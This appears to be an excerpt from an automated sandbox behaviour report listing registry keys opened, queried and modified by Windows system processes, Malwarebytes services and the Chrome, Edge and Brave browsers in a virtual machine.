| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Phantom | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Phantom | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Phantom | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\CompatibleIDs | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID | C:\Windows\system32\DrvInst.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Malwarebytes.exe = "11000" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\mbam.exe = "11000" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\mbamtray.exe = "11000" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Policies\Microsoft\Office\15.0 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Office\16.0\Common\Security | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Malwarebytes | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Office\15.0\Common\Security | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\NGC\SoftLockoutVolatileKey | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\Office\16.0\Common | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\Office\16.0\Common\Security | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\updatrpkg\mbupdatrV5.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Policies\Microsoft\Office\15.0\Common\Security\Trusted Protocols\All Applications\malwarebytes:\ | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\Office\15.0\Common\Security | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Policies\Microsoft\Office\16.0\Common\Security\Trusted Protocols\All Applications | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Policies\Microsoft\Office\15.0\Common\Security\Trusted Protocols\All Applications\malwarebytes: | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19 | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Office\15.0\Common\Security\Trusted Protocols | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Malwarebytes\FirstRun = "false" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Office\16.0\Common | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Office\15.0\Common\Security\Trusted Protocols\All Applications | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Policies\Microsoft\Office\15.0\Common\Security\Trusted Protocols\All Applications | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Malwarebytes\FirstRun = "false" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\Office\16.0 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\Office\16.0\Common\Security\Trusted Protocols\All Applications\malwarebytes:\ | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\Office\15.0\Common\Security\Trusted Protocols\All Applications\malwarebytes: | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\Office\15.0\Common\Security\Trusted Protocols | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\Office\16.0\Common\Security\Trusted Protocols\All Applications | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT | C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\updatrpkg\mbupdatrV5.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D5627FC9-E2F0-484B-89A4-5DACFE7FAAD3}\ = "IProcessLauncher2" | C:\Program Files (x86)\BraveSoftware\Update\1.3.361.149\BraveUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5D448EF3-7261-4C0C-909C-6D56043C259D} | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{ADA09B8D-A536-4429-8331-49808442D24B} | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{CE7ABFE9-8F8F-4EDD-86BD-9209FD072126} | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F3968E6D-3FD5-4707-A5A8-4E8C3C042062}\ProxyStubClsid32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F1E58D1A-2918-4508-908A-601219B2CCC6}\TypeLib\Version = "1.0" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{35A4470F-5EEC-4715-A2DC-6AA9F8E21183}\ProxyStubClsid32 | C:\Program Files (x86)\BraveSoftware\Update\1.3.361.149\BraveUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{AFC6D7FD-62B9-4016-9674-53BAC603E9FC}\TypeLib\ = "{226C1698-A075-4315-BB5D-9C164A96ACE7}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{09F245DA-55E7-451E-BDF3-4EE44637DFF1}\ = "IArwControllerEventsV2" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F81B1882-A388-42E5-9351-05C858E52DDC}\ProxyStubClsid32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BAFDF38F-72A8-4791-AACC-72EB8E09E460}\ = "IMBAMServiceControllerV2" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6724C143-DE69-4A93-80ED-19B75DD2AA99}\TypeLib\Version = "1.0" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D4AC5360-A581-42A7-8DD6-D63A5C3AA7F1}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0DB6AD16-564C-451A-A173-0F31A62B7A4D}\TypeLib | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{EFF9CA12-4CD3-474B-B881-CDE1D92F1996} | C:\Program Files (x86)\BraveSoftware\Update\1.3.361.149\BraveUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1C510D99-F27D-457F-9469-CFC179DBE0C7} | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6CE18DD5-2BD7-4844-B9AD-DF6A995750A1}\TypeLib | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{19B9825A-26E8-468B-BD9F-3034509098F0}\TypeLib\Version = "1.0" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9BFD0661-4D6A-4607-8450-2EF79859A415} | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{EABA01A8-8468-430A-9D6E-4C9F1CE22C88}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{983849D5-BFE9-43E9-A9A0-CBAFBC917F39}\ = "_ICleanControllerEventsV4" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MB.AEController.1\CLSID | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{08927360-710B-483B-BEEC-17E51FF84AF9} | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{79D77750-02E0-4451-A7BB-524ACD93DD93}\ProxyStubClsid32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7CFC4E00-1C9D-443D-B5BE-CEEEAC1443AF}\ = "IJobObserver" | C:\Program Files (x86)\BraveSoftware\Update\1.3.361.149\BraveUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B5D1924F-CB80-47AA-8DEC-5E0854A42A73}\VersionIndependentProgID | C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{ABC1D1AF-23ED-4483-BDA4-90BCC21DFBDB}\TypeLib\Version = "1.0" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{02143C0F-1656-4B2E-95E7-EA8178A29E2E}\ProxyStubClsid32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7F95C137-46FC-42FB-A66A-F0482F3C749C}\TypeLib\ = "{F5BCAC7E-75E7-4971-B3F3-B197A510F495}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2A153977-1A37-4EF7-9226-9E128FA51AE1}\TypeLib\ = "{226C1698-A075-4315-BB5D-9C164A96ACE7}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E2D56B7B-4B87-45A1-A6D3-5C77035141A6}\ = "IMWACControllerEventsV6" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AAE4AD28-500D-43BA-9F54-730CA146C190}\ProxyStubClsid32 | C:\Program Files (x86)\BraveSoftware\Update\1.3.361.149\BraveUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{59DBD1B8-A7BD-4322-998F-41B0D2516FA0}\1.0\0 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BDCB7916-7DE8-44C8-BAF6-F1BBB3268456}\TypeLib\Version = "1.0" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{68E3012A-E3EC-4D66-9132-4E412F487165}\ProxyStubClsid32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{19E8B60E-50A1-4E29-9138-A13421D2BF7D}\TypeLib\ = "{49F6AC60-2104-42C6-8F71-B3916D5AA732}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{19B9825A-26E8-468B-BD9F-3034509098F0} | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{19B9825A-26E8-468B-BD9F-3034509098F0}\ = "IMWACControllerEventsV11" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B243B0B7-0567-4DA5-B8E4-A4CE22A4F2B6}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2A0F9375-1809-45ED-AFE0-92852B971139}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A5091804-600E-4226-BF28-80ABFDF4AFAB}\ = "IScanner" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E230930A-6CC2-4B9D-8CE1-03F86A8EDA05}\TypeLib\Version = "1.0" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{5DA5CFCA-E804-4A2F-8B93-F5431D233D54}\ = "IMWACControllerV16" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{19F4616B-B7DD-4B3F-8084-C81C5C77AAA4}\ProxyStubClsid32\ = "{51F87104-87CE-44E6-B700-998AEB9FE260}" | C:\Program Files (x86)\BraveSoftware\Update\1.3.361.149\BraveUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{10479D64-2C5F-46CD-9BC8-FD04FF4D02D8} | C:\Program Files (x86)\BraveSoftware\Update\1.3.361.149\BraveUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{931E73FD-D487-4458-AA08-1FF41413377B}\ProxyStubClsid32\ = "{51F87104-87CE-44E6-B700-998AEB9FE260}" | C:\Program Files (x86)\BraveSoftware\Update\1.3.361.149\BraveUpdateComRegisterShell64.exe | N/A |
